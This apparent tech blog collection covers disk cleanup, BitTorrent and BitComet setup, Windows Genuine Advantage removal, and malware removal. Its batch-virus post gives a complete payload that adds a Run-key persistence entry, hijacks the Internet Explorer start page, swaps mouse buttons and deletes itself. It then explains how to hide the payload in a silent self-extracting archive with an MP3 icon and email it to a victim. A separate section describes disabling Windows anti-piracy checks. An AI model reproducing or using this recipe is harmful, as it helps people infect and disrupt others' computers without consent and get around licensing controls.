Clean the junk – free up the space

Many of us wonder where our ever scarce HDD space is being occupied … There have been cases when the physical sum of data on a drive mismatch with what is shown in drive properties. There must have been a few who were even given a low disk space warning for system drive. Though the visible data is easy to manage, just back it up if required and then delete from your HDD, but the issue is regarding what that is hidden to mankind …!!

In this post we will see how we can free up space on your system, particularly the system drives and learn about system services that eat up space.

Step1: The first simple task when you notice space being hogged in your system drive is to uninstall unnecessary programs. The regular add and remove programs wizard isn’t good since it leaves behind zombie files and registry entries belonging to the uninstalled application. This is where Revo Uninstaller comes into picture. Apart from running regular built in installer, Revo uninstaller also scans for and removes left over files and registry entries. Using Revo, remove all those programs that you don’t use.

Revo has another option to clean junk files as well … Click on Tools option … Click Junk File cleaner … Click scan … After scan finishes, a list of junk data is displayed. Delete them … Often those are prefetch files and thumbs.db files. They sometimes even sum up to a few hundred MBs in course of time.

Step2: Seek substitutes for bulky programs, those which are light on resources and consume less space as well. I prefer these ones-

  1. CD burner XP: CD burner XP is all loaded burning solution for your digital media, which in contrast with Nero, occupies just a mere 7 MB space. Only little requirement is that you need any of the dot net frame work installed.
  2. Foxit reader: This PDF reader occupies just 5-6 MB of space, in contrast with Adobe Reader, which occupies at least 150 MB of space.
  3. Media player classic: The K lite Codec pack is a all loaded solution for playing all media formats, instead of keeping installed all sorts of players.
  4. AVG Internet security suit is also lite on resources and space as well, occupying 50 MB on HDD … It has protection that when combined with its ease on resources, makes it preferable over McAfee and Norton sorts.

Step3: Temporary files created during browsing and installing applications stay in your temp folder for a long period … If disk cleanup wizard is being ignored, they can keep on collecting and often eat out a good chunk of your HDD space. Install CCleaner, it is a really good tool to delete temporary files and clean junk from registry as well. It cleans browsing history as well. Run it aleast twice a week to keep your HDD free of junk.

Also empty your virus vault, delete application reports etc.

Note: EUsing free registry cleaner is a great application to clean your registry. You can use it in combination with CCleaner to keep your registry clean.

Step4: Windows services too eat up space on your HDD. System restore and space allocated to recycle bin are two major space eaters.

System restore is by default enabled on all drives and is allocated 12% of HDD space. This means for a 320 GB HDD, 38.4 GB is being reserved for system restore. And similarly, recycle bin is also given 10 % of your HDD space on a global pattern by default. If you seldom use recycle bin function, like many of us does, it is best to allocate it really less space to save it for other useful purposes. System restore too can be allocated lesser space. A recent most restore point is a point of interest; more space allocated just means more restore points, which occupy space even if you never use them.

The space can be claimed back easily. Right click on recycle bin and go to properties … There, on a global pattern space is allotted to each drive, just change it to what you think best suits you. If you never use recycle bin, assign it a really less value.

Similarly you may change the system  restore allocated space. Just right        click on your my computer icon,    select properties, click on the System  restore tab. There you may disable  system restore on non system drives  and set it to 1-2% on the system drive.

Step5: Hibernation service too, if  enabled on XP (By default active on  Vista) consumes a space  equal to your installed RAM on your  system drive. Weigh your options, do  you really need this service? If not,  you may disable it … In control panel, go to power options, in hibernation tab, and uncheck the enable hibernation option.

Step6: Virtual memory equal to 1.5 times your RAM is allotted on your system drive by default. This is to facilitate operations in case you run out of RAM … If you already have 2 GB plus RAM, then you can set it equal to your RAM size. That too it is recommended you shift the assigned space to non system drive to boost performance, and hence, also, free up space on the system drive.

Right click on My computer icon > click properties > Go to advanced tab > Under performance section, click settings > Select advanced tab > under virtual memory section, click change.

Disable it on system drive and allocate it to some other drive where space is plenty.

Warning: NEVER disable it fully or assign it really low. In case you have sufficient RAM, like 2 GB plus, only then set it equal to your RAM size. Else, for less than 1 GB RAM, you may better assign it recommended 1.5 GB of space.

Step7: Now for something that may be eating the maximum chunk of your space on the system drive, your documents. By default, your ‘My documents’ are being saved in the documents and settings folder in system drive. Every thing you save in My music, My pictures, My videos etc goes there. Many applications too save their files in your documents location, including download managers, torrent clients etc. The solution is to simply change the default location to non system drive where space is plenty. This also saves your data in case you were to format your system drive. Once default location is changed, all your data is automatically transferred and now on all your data in stored at the new location.

Simply right click on My documents link in start menu and select properties. In target folder location, select move and browse to the new location, a non system drive where space is plenty. Set it there.

Step8: After the above steps, this is time to launch an offence against junk manually. Many applications leave their installer backups, settings files, temp files behind when they were removed normally. Probably there may be plenty of them in your system drive. Go to folder options > view > check show hidden files and folder > uncheck hide extensions of known file types > uncheck hide operating system files … Apply. Now enter your system drive.

You can now see the system hidden files too. If you have not shifted page file or not disabled hibernation, you can now see a hibernation.sys file and pagefile.sys file. Also the system volume information and recycler folders are visible. So are some other files like ntldr, autoexecute.bat etc. DON’T delete them!!! They are required by your system.

Get into the ‘documents and settings’ folder and your user folder. There enter local settings > application data. There carefully check if there are any folders of applications that aren’t installed at present and delete them. Also browse the installed application folders and delete any installer backups. Move your way around, slowly you will learn what is important and what is junk.

This way you can free up space on your system drive. The best bet is to arrange your data in an organized manner, this makes it easy to manage it and take backup or delete what you don’t need. Happy shifting!


Enter the torrents


In the world of file sharing, there is no greed….. You give what you have and take what you want… The more you give, the more you will get… And when file sharing is in discussion, there are many players- Rapidshare, Aries, Kazaa, Limewire, Shareaza, e- Mule, etc… But Bittorrent sharing, popularly known as torrents is the best… In this post we will learn torrent basics, how to download files using torrents, a few tips to unleash the beast within BitComet and scheduling torrents for download during happy hours.

Torrent network- How it basically work:

A .torrent file is a file that contains the basic information about a file or set of files. This includes the file names, sizes, the date created and some other information. The torrent file also contains an info hash – which is basically just a unique code for that torrent. No other set of file(s) will have the same info hash as this one. The final thing contained inside the torrent is a list of trackers. If you have some torrent files, you can’t open them in a text editor because they are encoded. You will need to open them in torrent client software.

A tracker is a computer on the Internet. The tracker’s role is to manage live torrent files and keep track of statistics. When you open a torrent file in your client software, your client software contacts the tracker specific to that torrent. You client tells the tracker how much of the actual files (described by the torrent) that you currently have.

A seeder is a person who has 100% of the files described by the torrent. If a torrent has no seeders, then no one (currently talking to the tracker) has anything to give.

A peer is a person who is looking for the files described by the torrent. The more peers the more people are actively looking for the files described by the torrent. A peer while downloading the file uploads it as well. When he finishes his download, he continues to upload it, thus becoming a seed.

A leech is a person who initially acts as a peer but after he finishes his download, leaves the swarm, freeing his part of bound bandwidth. Hence, if more and more people start to leech, older torrents will die out since there will be no seeds left.

A Bit Torrent client is any program that implements the Bit Torrent protocol. Each client is capable of preparing, requesting, and transmitting any type of computer over a network, using the protocol.

Working: To share a file or group of files, a user (seeder) first creates a small file called a “torrent” (e.g. MyFile.torrent). This file contains metadata about the files to be shared and about the tracker. Peers that want to download the file must first obtain a torrent file for it, and connect to the specified tracker, which tells them from which other peers to download the pieces of the file. Then the peer opens the file in a torrent client, which analyses the data stored in torrent file and downloads it from the seeder and other peer. Depending on number of seeds, and no of peers having data more than you, your download speed will be proportional. More the seeds and more the peers having more data, your download speed will be higher. But if no of peers become too high, then it causes a negative impact since there is more competition for bandwidth of seeds.

But torrent clients have this option which can limit the upload limits of data when they are acting as peers or seeds. Hence, some users misuse it to merely download and upload near nothing. Bittorrent network works on a principle of give and take, that is users who share more data while acting as peers or act as seeds once downloads complete are awarded with more download speed, while punishing those who don’t and lechers. But when a peer joins a swarm, he has no data, thus cannot seed. Hence, theoretically, he should be getting any data from seeds and other peers. But Bittorrent network has this feature of Optimistic Choking, which provides an initial bandwidth to new users, letting them download without uploading.

A few lines on downloading using torrents:

  1. The first step is to download the torrent. They are available at sites of trackers. Eg, Pirate Bay, ISO hunt, Mininova, etc. Search in these sites for your required data.
  2. When results turn up, choose the torrent that has maximum seeds and minimum peers, ie, greater seed/peer ratio. They help you attain more speeds. Also read comments, they are really helpful, avoiding embarrassment after having downloaded the data!
  3. Having downloaded the torrent, you need a torrent client. I prefer Bitcomet, feature rich, light and zippy …. A good interface when compared to other clients, and equally feature rich. Compared to others like Azureus (now Vuze), it has simple settings, which can easily be tweaked. Download and install Bitcomet.
  4. Open the Torrent file in Bitcomet, just double click on the file, it opens. It automatically starts downloading.
  5. Depending on speed, torrent download finishes and it starts uploading itself. Do upload for a while, since there are a many users who now depend on you for the file. The more you upload, the more you get back in terms of speed. If everyone starts to leech, the torrent will die.

Tips to improve BitComet performance:

BitComet can reach amazing speeds with a few little tweaks. The problem is that most users stick to default settings that came when they installed. Also people expect magical speeds even though they intentionally or unintentionally don’t upload anything! We now will tweak BitComet a little, so that it lives up to our expectations.

Open BitComet main interface, go to tools -> Options. Now start tweaking:-

  1. Upload speed: In connections tab, there is choice to alter the download and upload speeds. Download can be set to unlimited without any issue, but when you upload, if the upload speed crosses your limits, downloads suffer. Hence, know your capabilities first. Setting an unlimited in upload too isn’t advisable.  Run a speed test first-

You will know your speeds now. In TCP/IP networking, every piece of data received has to be acknowledged as received by sending a small packet of data back to sender that previous data packet is received and receiver is ready for another. In case you are uploading at maximum speed, it becomes tough to send that acknowledgment data packet, hence another data packet is delayed, causing download to suffer. This is known as ‘choking’.

To prevent this, set your upload limit to 75 % of your maximum upload limit.  The speed shown in test is in terms of kbps (Kilo bits per second) but we enter it in terms of kBps in BitComet. Hence to convert, divide the speed by 8 and multiply by 0.75. The result should be set as upload limit.

  1. ii. Listen port: By default a listen port is assigned. Since this is default, there will be a lot of traffic there. Change it to any random port between 49152 and 65534. Listening improves your speed greatly, hence should be enabled at all costs.
  2. iii. Port mapping: Tick enable NAT\Firewall configuration, this will let Bitcomet register its listening port in Windows Firewall. But enabling UPnP mapping sometimes causes stability issues, hence can be left un-ticked.
  3. iv. Tasks: In the task main menu, under download, tick auto resume tasks at program startup. This will help us out later in scheduling. Also limit number of concurrent download tasks to 3-5. This setting depends on your modem and connection. Letting only one task run, if it’s not well seeded, costs you more time since you are capable of more. At least set it as 3. This will cumulatively help in utilizing all of available bandwidth. Experiment what suits you and set it.
    1. a. BT task: In auto stop task, un-tick the option, its better left un-ticked for better speeds.
    2. b. In upload, set maximum rate of upload per task as global upload speed ( found in step i) divided by number of concurrent tasks you chose. Choose a minimum of at least 5 KBPS.
    3. c. Enable long time seeding and set the upload speed as chosen as max upload speed per task. Long time seeded torrents will upload themselves continuously, and fetch you more speed.
  4. v. Integration: In integration, if you have unlimited bandwidth scheme, choose to start Bitcomet at windows startup, else for limited plan users, un-tick it. This will assist us in scheduling purposes.
  5. vi. Advanced: In main menu of advanced, set network maximum connecting connections (max simultaneous half open TCP connections) as 70 -100. Choose a value that suits you. Also set network maximum connections (Global maximum connections) as 200-250. This will prevent your modem getting disconnected in case of heavy overloading due to multiple connections torrents develop.
    1. a. TCP/IP limit: Set TCP/IP limit as 70 -100. By default it is 10. This will greatly improve your download speed with torrents.
    2. b. Schedule : According to plan details, you can either leave this option for unlimited or choose the max speed time as happy hour time in limited plan and set rest as turnoff…Accordingly set upload speeds, since they supersede the global upload speeds.

Apply these settings and restart you PC. Register an account with Bitcomet. Registered users get better speeds. Now it is time to verify if your listening port is forwarded properly or not. Just connect to internet and view the right most button in bottom toolbar. It should turn yellow on establishing a listening port. Usually, dial up connections have this forwarded easily. The PPPoE mode users need to get into their modem configuration wizard and change NAT policies to enable it. Follow this procedure-

  1. In address bar type as address. This is address of your modem. Both User name and password is admin. In some other cases, username is admin and password is password.
  2. This will open your modem configuration settings. In advanced setup, go to NAT. Depending on different modems, you will have to do according now.
    1. For the type 1 provided by BSNL, UTstar com r2u, in NAT, just enter DMZ host ip address as 192.168.1.x, where x should not be 1 if DHCP is enabled. Choose it as . Save and apply.
    2. For some other modems, you will need to add a profile in NAT and then enter the IP. Some other ones ask you the port too. Add your selected Bitcomet port. Just enter the data, save and reboot the modem.
    3. The IP mentioned is the static ip provided by BSNL. If you happen to have a dynamic IP, enter it accordingly.

After having configured your modem, its time to configure the firewall. Add Bitcomet to list of trusted applications and allow it privileges to access all services. Various firewalls have different in particular methods. Use one which is torrent friendly. Like AVG firewall blocks all outgoing communications, though configuring Bitcomet as trusted. I switched to outpost free then, its working fine now. Visit this site for more assistance-

Now, open Bitcomet and check if third light on bottom toolbar is glowing. This verifies port is forwarded. Remember, slower downloads can be attributed to mainly these reasons-

  1. Port not forwarded in modem\router.
  2. Firewall blocking communications.
  3. Upload slot is too narrow, increase the limits.
  4. Default TCP\IP settings.

Having tweaked your client lets move on to scheduling downloads….

Scheduling torrent download tasks:

For the limited bandwidth plan users, it’s a curse to wake up late in night and start the download and again early in morning to stop it. Though Bitcomet comes with a scheduler, but off the happy hours, keeping Bitcomet active will cause long time seeding, also adding electricity bill if you keep your PC on, and waiting for happy hours.

Isn’t there a way out of this vicious circle? So that you may go to bed early and wake up late, …. and still download?? Realizing your dilemma, I reacted and churned out a solution in recent days when I was idle at home, thanks to my holidays. So, I present before you- Auto-connect, the download scheduler. Download it from downloads section, you will always find the latest version there. Or visit the Auto Connect support page-

Download Auto-Connect

Since I have already mentioned a lot of Gyaan in the help file, I prefer being a bit lazy and not repeating it all back here, will just outline the download procedure.

As I had already mentioned while tweaking Bitcomet, tick “Auto resume tasks on program startup” and un-tick “start Bitcomet on login windows”. This will prevent accidental downloads during off happy hours when you log on windows. Also auto resume tasks will help automate downloads, since downloads will start as soon as you launch the client, no need to start tasks manually.

Note: In “Auto resume tasks…” , only those tasks will resume which were running when you closed the client last time. The paused and stopped tasks don’t resume.

Scheduling involves these steps:

  1. First set up auto connect and schedule a dial up task. This implies to only to dial up mode users. Schedule a connect task at least 5 minutes inside the happy hours slot. Also enable wakeup from sleep feature for this task.
  2. Then go on and schedule a disconnect task at least 5 minutes before end of happy hours. This will disconnect you connection at scheduled time.
  3. Then schedule an application run task, a minute or two after the time of connect task. Choose the application as Bitcomet.
  4. Then go on and schedule an application close task. It should be a minute before the scheduled disconnect task. Choose the application to close as Bitcomet.
  5. Then schedule a sleep task. Set the time as a minute after the disconnect task .This will put your PC back to sleep again.

Caution!! :

  1. PC wakes only from sleep or hibernation, it won’t wake up when it was turned off.
  2. Keep you modem turned on when you go to sleep. Schedule will resume, but my software unfortunately can’t press the modem power ON button if it is off!!
  3. You may keep your monitor turned off to save power.
  4. There is no need to wonder how to enable hibernation, if it was off in your PC. Auto connect will turn it ON on first run. But be sure space equivalent to your RAM is free on you windows drive, else hibernation can’t be set!
  5. You need to schedule an application close task for Bitcomet at end of happy hours to hibernate, since Bitcomet won’t let your PC hibernate when a download is in progress.

This schedule will wake up your PC from sleep at dial up task time and connect to internet. Then it will launch your Bitcomet client. Since auto resume tasks have been chosen, downloads will start automatically. At near end of happy hours, Bitcomet will close as scheduled, internet disconnects and then PC goes back to sleep.

Note: The users of PPPoE or always ON mode don’t need steps 1 & 2. They can directly schedule an application run task, with wakeup option, to run their suitable modem reboot module as mentioned in Auto connect support page. PC will wake up, modem will reboot, reconnect to internet and resume scheduled download. Other steps follow accordingly.

Make your own batch file virus

<< Read this newer post on making batch file viruses, loads of new tricks on batch virus programming and tips on how to remove them >>


It’s always been this way that we fellows be the good guys and save the day fighting malware threats… But as they say, you need to think like a criminal to catch one! And so we do the same, to understand how a malware works, how does it gains access, gains control, we will our self make a batch file based virus. A little knowledge of programming, just to extent how we do it, and knowledge of windows registry is a prerequisite.

Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that gets executed when the batch file is run. This allows you to make simple programs that perform simple tasks under limitations of DOS shell. Though higher level languages like BASIC, PASCAL and C interacts with system on lower level, batch file processing is a good start to understand malware.

The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch.

The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file.

Before code, let’s learn a few basics, first on creation on batch files. These aren’t any special files created by some special applications. They are simple notepad files, where in code is written and then its extension changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc , a few moderate tasks like changing file attributes ( i.e. making a file hidden, giving system attribute or removing the attributes) and a few complex tasks like altering a system registry without user intermission. The main draw back in a batch file is that it doesn’t remain active in memory (though we can make it by some loop), it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.

Now, let’s learn a few commands of batch files. Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is-

RENAME [Drive]: [path] filename1 filename2

Example:             RENAME C:\documents and settings\aijaz.txt gyaan.dat

Hence we see we can change the extension of file as well. If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running.

Example:             RENAME aijaz.txt gyaan.dat

This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat.

Coming to MOVE command, it moves the file from one path to another. It is like cut and paste. The syntax is-

MOVE [/Y |/-Y] [drive] [path] filename destination

The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user.

Example: MOVE /Y C:\aijaz.txt D:\

This moves the file aijaz.txt to drive D: . While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory.

We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory–

C:\Documents and settings\”user name”\local settings\application data\Microsoft

But the windows directory may be different drive like D:, E: and even the user name isn’t known. This makes it not suitable to mention a specific path in our code. We use system parameters to identify windows drive and user profile directory. The command – %userprofile% returns the path of the location highlighted in above command. To give path in CMD using system parameters, we need to write path in quotation marks. The command to change wallpaper becomes-

MOVE /y Wallpaper1.bmp “%USERPROFILE%\Local Settings\Application Data\Microsoft”

This copies the wallpaper from current directory to the location where wallpaper is stored.

Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap.

Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command-

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

After the execution of batch file, it is desired that it isn’t available to host PC that he may open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files.

Del /F /Q /A:SHR filename

/F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.

Now coming to editing registry, there are two methods of editing a key, first by making a .REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command.

The syntax to add a key to registry is-

REG ADD main key/v Sub key /t data type /d value /f

The /f parameters enables editing a key without confirmation from user. Our intention is to add a start-up entry in registry such that our code gets executed every time windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is-

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use %windir% parameter to make sure that no error is encountered in case OS is installed on some other drive.

The point to be noticed here is that the same technique is used by malware to make sure they remain active in memory. The first thing to be done having ended a malicious code execution is to terminate its start-up mechanism. Refer the post Eradicate malware.

Similarly to change the start page of internet explorer (tested on IE 6), the registry key is-

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f

Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack. I am still working on changing start page of Mozilla Firefox.

Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more! Here is the command….

RUNDLL32.exe USER32.DLL,SwapMouseButton

Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script….


REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

copy /y Wallpaper1.bmp  “%USERPROFILE%\Local Settings\Application Data\Microsoft”

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

RUNDLL32.exe USER32.DLL,SwapMouseButton

rename song.exe  force.exe

move /y force.exe “%windir%”

del /Q force.bat

del /Q wallpaper.bmp

Save the file and change its extension to .bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can be simply be done by opening the file in note pad and making it funny or if you how to, edit it in Photoshop. Or sites like photo funaic can be used to spoil the photo. Usually these photos are JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of photo. Rename this photo to wallpaper1.

It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX.

Install IconFX and run it. In file menu, go to extract icons. Browse for shell32.dll file located in windows\system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an .ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon. Save the icon at some location.

  1. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option.
  2. In the opened window, click Create SFX archive.
  3. Go to Advanced tab and SFX options in it. In path to extract, select create in current folder. In setup program section, in Run after extract, add name as force.bat.
  4. In Modes tab, under silent mode section, select hide all.
  5. In update tab, in overwrite section, select overwrite all files.
  6. In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single .exe file which has an icon of mp3 file. Let’s rename this file as song.

Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.

Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intensions! But the problem here is that if we mail it as it is, either clients like Yahoo doesn’t allow attaching .exe files, also when victim downloads the file, its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!!

Though I am still working on making better ones, but I would like to end this post with a message that this was just for a little fun and to develop an understanding how malware works. Let’s not drift towards the wrong side of society!

<< Read this newer post on making batch file viruses, loads of new tricks on batch virus programming and tips on how to remove them >>

Windows Genuine Advantage

Having a genuine copy of windows is really worth it, considering support and updates from Microsoft, and even new upgrades asks for validation. But there are events reported that even genuine licence holders some times get caught in WGA trap, if forums are to be believed.

Windows Genuine Advantage is Microsoft anti piracy tool that verifies if the licence you use for your windows is genuine or not. It comes included in a few upgrades, or as a update online in windows update, or is asked to get validated in case you download something from Microsoft. The tool upon verification of licence, if it fails sets up a startup process that pops up  a window that informs that you use a pirated version of windows, on logon screen and toolbar on desktop as well, making it really annoying.

Lets be on right side and believe you got caught in this issue even though you hold a genuine licence 🙂 , here is solution that stops the annoying process while you get the issue solved from Microsoft.

The hard way- The startup application uses files wgalogon.dll and wgatray.exe . To get started, go to folder options-view and un-tick hide extensions of known file types. Apply and exit. The process of stopping it consists of two steps-

i. Cutting the database- Go to C:\windows\system32 and search for a file named wgalogon.dll . Rename it to wgalogon.dll.bak . Create a new text document and rename it to wgalogon.dll . Upon saving, a confirmation is asked to change extension, confirm yes.

ii. Now in same directory search for a file wintray.exe . Using killbox, while ending explorer shell, delete the file. Restart the system. The pop up will no longer come.

The soft way- A software counterfeiting error may also be generated  even when we change the original key with a software generated key, resulting in conflict. So, in case you have the original key, use the magic jelly bean key finder tool. It not only displays the current key, but you can also go to options and change the key installed as well. Just change the key to original one and the pop up should no longer appear.

The easy way- There are programs available that can remove WGA error on a click. For novice users, it’s a bliss. Check out the one available at- .

In case you haven’t get troubled yet, and don’t want your windows verified, just run MSCONFIG, go to services and disable automatic updates and also security centre (else it pops up error that automatic updates are disabled). A little disconnected from Microsoft, you can continue your secret life!

The next post is going to be about being the BAD guy… a dose of batch file programming to make your own kitchen made viruses! Trick you friends, play prank on pals, make your enemies suck, its time for a little mischief!!



If someone says that he never encountered a malware infection on his PC, probably he is lying. What ever antivirus you use, at some point of time, you will face this occasion that PC gets infected and your antivirus never detected it. Modern day heuristics enabled antivirus have reduced such chances, but most of the time its not so. The strangest thing about malware is that you feel their presence without any diagnostics! May be that’s because of the resonance that we develop with our PCs over time…!

Let’s first learn what malware are…

Types of malware:

  1. Virus: A virus is a malicious program that can replicate itself and affect normal operations of a system without knowledge or permission of the user. It attaches itself to executable code and runs every time the code is run, making multiple copies of itself. It corrupts the files, denies access to data and hence renders data useless.
  2. Worm: Unlike a virus, a worm is independent and doesn’t attach itself to any file or code. It is capable of spreading without need of any host file. It replicates by copying itself through network. Worms prominently attack only networks, sending its copies to all users in your address book, causing DoS (Denial of service) attack and affecting your internet functionality.
  3. Trojans: As the name goes, it hides inside a seemingly legitimate program and runs malicious code from there. Once run, the host computer gets infected and it starts replicating. It performs various activities like sending your data to its creator, or logging what you type (your passwords, bank account details) and sending them to its creator without your consent. It can even cause damage to your data by simply deleting it. Trojans have capability to change their code to trick the antivirus programs into not detecting them. Some are even scheduled to strike at preset dates.
  4. Spyware: Very similar to Trojans, these applications are solely designed to steal your data. But unlike Trojans, they don’t have the capability to replicate themselves.
  5. Cloaked malware: These are the new generation malware that are becoming a nightmare in computing sector. Cloaked malware are Rootkits that are invisible to windows explorer and hence to antivirus. They run hidden from task manager making it difficult to mark its presence. Its files are hidden on system and thus antivirus doesn’t detect them.

So, these are malware. Once executed by us, they go active in system memory, multiplying and applying constrains to privileges and adding entries to registry to make sure that are run at least once when system starts. They add malicious entries to registry to make sure that they are masked by disabling task manager, registry editor and folder options.  They make files that enable them to be executed when drives are opened and continuously monitors ours system to gain chance to spread. But how do we identify their presence in our systems?  These are the symptoms….


i. Unrecognised processes and files: The presence of unrecognised processes running in task manager or presence of unrecognised files on drives marks presence of malware.

The key to identifying the presence is to keep vigil on the processes that run in back ground. This begins from day you install a software, see what process it runs. Also remember what all files you have present on your hard drive. Any new file or folder with .exe extension, anything with provocative name or cute icon can potentially be a result of infection. In event of task manager being disabled, process explorer by sis internals can be used to analyse processes running.


ii. File and system behaviour: If you ever notice that drives open in new windows, system taking more time during startup, CPU showing excessive activity even on no load or files or folders reappearing even after deleting them or not getting deleted at all, there is a high probability that your system is infected.

Files in pendrive disappearing and being replaced by smaller folders (with .exe extension if noticed) very clearly indicated presence of malicious code.

File activity can be detected by using the application filemon. An expert view on file activity can easily uncover malicious activity.

iii. Network activity: If you get complaints that some of your friends are getting strange e-mails from you, with links to unknown sites or strange file attachments, this could be a worm at work.

Increased network activity noticed in portmon etc also implies presence of network worms.

iv. Reduced privileges: Getting error messages of “ ….disabled by administrator….” on running RUN , Task manager or accessing Registry editor etc plainly implies your system is infected and malicious entries made in registry.

v. Malicious entries in registry: Same implies when you get errors on startup like file not found etc. This is because of malicious programs making entries in registry to auto start at system startup. This can also be analysed by using the application autoruns from sis internals suit. Or simply run MSCONFIG in run menu and check startup applications.

These symptoms confirm presence of malware in your PC. Now that you know that you two aren’t alone, how do you zero in on the culprit, keeping in mind that your loyal antivirus let it in? Here under is a step by step procedure to catch the culprit and to kick it out. Stop all other applications and disconnect the internet. Keep your weapons handy…….. War has begun!

Eradication of malware:

i. Identification of process in memory: Once executed, the conventional malware tend to be active in system memory, running a process that carries out the task the malware was designed to do. Nowadays it is common that malware alters registry to disable task manager, Run and registry editor, hence use process explorer to view active processes in memory. Tips to identification includes-

a. Usually a few malware are easily identified by very high CPU usage even when you aren’t running any CPU consuming application.

b. Many carry names that are suspicious to even laymen. Some include Khatarnak.exe, khatra.exe, music.exe, new folder.exe, soundmix.exe, etc. Most of them run under the explorer section in process explorer.

c. Smart viruses today carry names that are spoofs of windows processes. Like Regsvr32.exe is a windows application, but virus carry name Regsvr.exe. Similarly a malware spoofs the name of windows service host svchost.exe and run a process svcshost.exe. In such cases identification becomes tough and depends more on your experience and logical approach. Obviously a process Regsvr.exe isn’t expected to run always in your system. And a service host with odd spelling that runs under explorer is suspicious. Assistance can always be taken on-line regarding any suspicious process.

d. Repetitive processes of same name present in memory, when just one or no such application is running, also points out that the process is malicious code. But svchost.exe is one exception, with 5 such processes running at a time.

e. Reverse analysis can be made by identifying all legitimate processes and their triggering applications to identify the left out applications as suspicious.

f. Cloaked malware aren’t easily identified since they run hidden from explorer. Their files and memory residency isn’t visible. Hence, their presence is hard to verify. The sis internals tool Rootkit revealer does a good job in detecting Rootkits. It scans registry and file system for discrepancies and lets us know possible Rootkits that are actually present but not mentioned in windows API. Extreme caution should be taken while taking any action based on its result, since it just gives a probable result and not certain. Rootkits are those set of malware which I suggest are better removed using antiviruses.

Having identified the malicious process in memory, the next task is to know where it is executing from. This can easily be verified from process explorer.

ii. Stopping the malicious code execution: The next step is to stop the execution of malicious code. The malicious code as long as active in memory can keep multiplying, and monitors system to maintain its malicious action and keeps vigil on registry, not allowing it to be rectified. This task can simply be done by task manager/ process explorer or may even need a boot from secondary device.

Note: Now on, don’t open any drives by double clicking on them, since this can trigger drive autorun which is usually linked to auto running malicious code using an autorun.inf file. Open drives by address bar or explore instead. Do not open any new folders etc, since they can probably be masked Trojans having folder icon!

a. The basic step is to end task the identified malware to stop its execution. This can be done directly by process explorer .In case a new malicious process pops up on termination of the first process, probably its running from another location. End task that process too. Preferably end task the process tree, but be sure you have noted down where from it is executing.

b. In case the process keeps on starting again and again, it probably got another file backing it up. In that case, using killbox, end process and delete the file. To use killbox, it is required to know the location of the file, which is obtained from process explorer.

Note: Even if file was end tasked in step a. , it has to deleted using killbox. The reason killbox isn’t given priority to end explorer shell is that while deleting the file with ending explorer shell, it restarts the windows explorer, which is often accompanied by malicious code executing again. The best way is to end task the process using process explorer, delete it using killbox. If file is in use, unlock it using the tool Unlocker, and then delete it.

c. Some smart malware can’t be deleted even using killbox, sighting privileges issues. Then it is required to boot from a secondary device, preferably Bart’s PE live CD and delete the malicious files.

d. Rootkits once identified can be deleted the same way as above using killbox or by boot through a secondary device. Since the process they run is hidden, it becomes tough verifying if the malware execution has stopped or not. Rely on your instincts to see if every thing is ok or assume at this stage that malware is not active in memory now.

